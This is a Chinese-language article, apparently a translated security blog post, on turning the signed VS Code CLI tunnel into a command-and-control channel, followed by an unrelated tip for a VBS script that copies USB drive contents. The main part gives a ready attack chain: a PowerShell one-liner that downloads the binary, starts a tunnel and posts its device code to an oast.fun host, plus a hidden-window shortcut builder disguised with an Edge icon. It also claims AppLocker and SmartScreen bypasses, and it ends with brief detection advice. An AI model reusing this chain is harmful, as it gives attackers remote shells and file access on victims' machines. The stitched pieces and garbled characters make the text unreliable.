S 提供了一個已簽名的二進制文件 (code.exe)���,它將通過 Microsoft 官方域 https://vscode.dev 建立C2通道。C2 通信本身將通過 WebSockets 轉到
https://global.rel.tunnels.api.visualstudio.com����,攻擊者只需要一個 Github 帳戶。
01 前言
最近我瀏覽了一些 MS 文檔并偶然發現了這兩頁。
https://code.visualstudio.com/docs/remote/tunnels
https://code.visualstudio.com/blogs/2022/12/07/remote-even-better
這里我們看到了什么�?VSCode 能夠與遠程系統建立連接�。
在頁面的末尾�����,有一個'code'客戶端��。此客戶端將輸出綁定到此遠程計算機的 vscode.dev URL,您可以在您選擇的客戶端上打開此 URL。例如:
https://vscode.dev/tunnel/<machine_name>/<folder_name>
02 怎么弄
準備客戶端,從這里獲取客戶端上的二進制文件:
https://code.visualstudio.com/sha/download?build=stable&os=cli-win32-x64
由于二進制文件是由 Microsoft 簽名的�,我們不需要處理 Mark-of-the-Web�����,因為它會被忽略,我們也會繞過 Smartscreen。結合后面看到的一些技巧��,如果在默認配置下���,我們還將繞過 Applocker 和 Powershell 約束語言模式����。
客戶端證書如下:
在客戶端啟動二進制文件
PS C:\temp> .\code.exe tunnel
*
* Visual Studio Code Server
*
* By using the software, you agree to
* the Visual Studio Code Server License Terms (https://aka.ms/vscode-server-license) and
* the Microsoft Privacy Statement (https://privacy.microsoft.com/en-US/privacystatement).
*
? Do you accept the terms in the License Agreement (Y/n)? · yes
To grant access to the server, please log into https://github.com/login/device and use code 71BC-3082
...
我們按照說明并在攻擊者系統上打開提供的 url。我們將看到一個設備代碼身份驗證。
之后���,將建立代碼隧道。
PS C:\temp> .\code.exe tunnel
*
* Visual Studio Code Server
*
* By using the software, you agree to
* the Visual Studio Code Server License Terms (https://aka.ms/vscode-server-license) and
* the Microsoft Privacy Statement (https://privacy.microsoft.com/en-US/privacystatement).
*
Open this link in your browser https://vscode.dev/tunnel/itsmeC2/C:/temp
03 通過瀏覽器或 VSCode 連接
我們按照指示在攻擊者機器上的瀏覽器中打開頁面。
我們在受害者機器上得到了一個不錯的工作項目�。 通過 URL����,我們可以控制路徑���,這意味著如果我們只使用 C:��,我們可以在用戶權限的限制下訪問系統上的所有文件。 因此���,打開如下URL并將 C: 添加到工作區。
https://vscode.dev/tunnel/itsmeC2/C:
很好�����,我們可以遠程瀏覽�����、閱讀和編輯所有文件����。文件瀏覽很好��,但是命令執行呢����?可以這這里找到:Menue -> Terminal -> New Terminal
我們在客戶端上獲得了一個很好的 Powershell 遠程會話�����。Remoteshell 擁有我們想要的一切:
訪問歷史
語法高亮
Tab補全
作業控制 - 意思是交互
這是一個反應靈敏且好用遠程 Powershell 會話�����。
除了 Powershell 會話之外,還有一些其他可能性�,例如運行任務���、“運行和調試”文件或者我們可以進行本地端口轉發����。
一個不錯的功能是在遠程主機上安裝擴展�����。例如�����,如果主機上安裝了 Python,我們就可以運行一些 python 腳本��。這里需要注意的是����,我們需要將文件保存到磁盤,也有一些解決方法��。
通過 VSCode Desktop 連接非常簡單��,您只需要 MS 官方博客文章中所述的擴展�。
04 構建攻擊鏈
讓我們試著建立一個完整的攻擊鏈��。首先�,我們應該檢查����,是否可以擺脫啟動隧道的交互部分,并在命令行上提供參數���。
我們可以提供一個名稱來為我們的會話獲取一個固定的實例名稱:
.\code.exe tunnel --name itsmeC2V2
然后是身份驗證的問題,我們必須使用 Github OAuth 刷新令牌進行身份驗證��。
https://github.com/microsoft/vscode/issues/170013
我沒有設法使 Github OAuth 令牌身份驗證正常工作�����,因此需要一個額外的步驟,將設備代碼發布到
https://app.interactsh.com/#/ 等服務。
cd C:\tmp #change folder
iwr -uri https://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip -OutFile vscode.zip #download binary
Expand-Archive vscode.zip #Expand the zip
cd vscode
.\code.exe tunnel user logout #logout previous user, if existing
Start-Sleep 3
Start-Process -FilePath .\code.exe -ArgumentList "tunnel --name Ooooopsie2000" -RedirectStandardOutput .\output.txt #start tunnel and redirect the output to a txt file
Start-Sleep 3
iwr -uri cf8ryhj2vtc0000w93v0g8wcxjyyyyyyb.oast.fun -Method Post -Body (Get-Content .\output.txt) #Post output to interact.sh for the code
我們可以建立一個快捷方式來啟動鏈�����。
#Payload
$EXEPath="$env:windir\System32\WindowsPowerShell\v1.0\powershell.exe"
$pay='cd C:\tmp; iwr -uri https://az764295.vo.msecnd.net/stable/97dec172d3256f8ca4bfb2143f3f76b503ca0534/vscode_cli_win32_x64_cli.zip -OutFile vscode.zip; Expand-Archive vscode.zip; cd vscode; .\code.exe tunnel user logout; Start-Sleep 3; Start-Process -FilePath .\code.exe -ArgumentList "tunnel","--name","Ooooopsie2000" -RedirectStandardOutput .\output.txt; Start-Sleep 3; iwr -uri cf9dk1w2vtc0000vhr10g8ws3ohyyyyyb.oast.fun -Method Post -Body (Get-Content .\output.txt)'
$arguments=" -nop -c $pay"
#lnk file
$LNKName=123
$obj=New-Object -ComObject WScript.Shell
$link=$obj.CreateShortcut((Get-Location).Path + "\" + $LNKName + ".lnk")
$link.WindowStyle='7'
$link.TargetPath=$EXEPath
$link.IconLocation="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
$link.Arguments=$arguments
$link.Save()
05 視頻演示
該視頻通過快捷方式展示了一個攻擊鏈示例�,并通過 interact.sh 服務收集了設備代碼。
“視頻詳見頭條號里的視頻”
如果我們添加一些眾所周知的 Applocker bypass路徑�����,如 C:\Windows\Temp 并使用 --cli-data-dir 指定工作目錄����,我們也可以擊敗基本的 Applocker 配置,即使以非管理員權限用戶在受限語言模式 (CLM) 中運行 Powershell。
06 IOC 與緩解措施
code程序正在生成一個 nodejs 應用程序和一些檢測功能的 powershell 腳本。
正如微軟所說,通信通過
global.rel.tunnels.api.visualstudio.com 和 WebSockets 進行,因此可以阻止。
https://code.visualstudio.com/docs/remote/tunnels
如果您是想要控制對遠程隧道訪問的組織的一部分��,您可以通過允許或拒絕訪問域
global.rel.tunnels.api.visualstudio.com 來實現�����。
在隧道模式下啟動 VSCode���,將在磁盤上刪除一些 JSON 文件��。文件的位置通過 --cli-data-dir 參數傳遞,但默認為:%UserProfile%\.vscode-cli
因此,可以監視 code_tunnel.json。
參考及來源:
https://badoption.eu/docs/blog/2023/01/31/code_c2.html
如何讓Win10系統U盤連接電腦后自動備份文件夾?
我們經常會遇到一些U盤文件損壞的問題,但是U盤憑借著其小巧易攜帶的特點�,已經成為了許多用戶存儲重要資料文件的主要方法�����,那么要如何防止U盤文件損壞呢?讓它自動備份是一個很不錯的解決方法,下面就一起來看看具體的解決方法吧���。
解決方法:
1、使用組合鍵(win鍵+r)打開運行窗口,并輸入“notepad”���,按回車鍵新建一個記事本���,如下圖所示:
2、在新建記事本中輸入以下代碼:
set fso=createobject(“scripting.filesystemobject”)
set ws=createobject(“wscript.shell”)
on error resume next
do
wscript.sleep 1000
if fso.driveexists(“h:\”) then
fso.copyfile “h:\*”,“d:\備份文件\”
fso.copyfolder “h:\*”,“d:\備份文件\”
wscript.sleep 20000
end if
loop
其中紅色字體“h”為u盤盤符�����,綠色字體“d:\備份文件\”為備份u盤文件的存儲地址��;
然后點擊“文件——另存為”��,如下圖所示:
3、在彈出的另存為窗口中,先點擊左側“桌面”�,然后把保存類型設置為“所有文件(*.*)”�,文件名設置為“fz.vbs”����,接著點擊“保存”按鈕,如下圖所示:
4、此時�����,桌面上就能夠看到fz.vbs文件了��,如下圖所示:
雙擊運行fz.vbs文件�,接下來只要有u盤插入本機usb中����,計算機就會自動備份u盤文件夾保存到設置的地址中。如果要結束自動備份文件功能���,打開計算機任務管理器,找到并結束wscript.exe程序即可。
以上就是讓U盤插入電腦時自動備份文件的方法了���,如果你擔心自己U盤中的重要文件丟失損壞,那么就用這種方法進行解決吧。
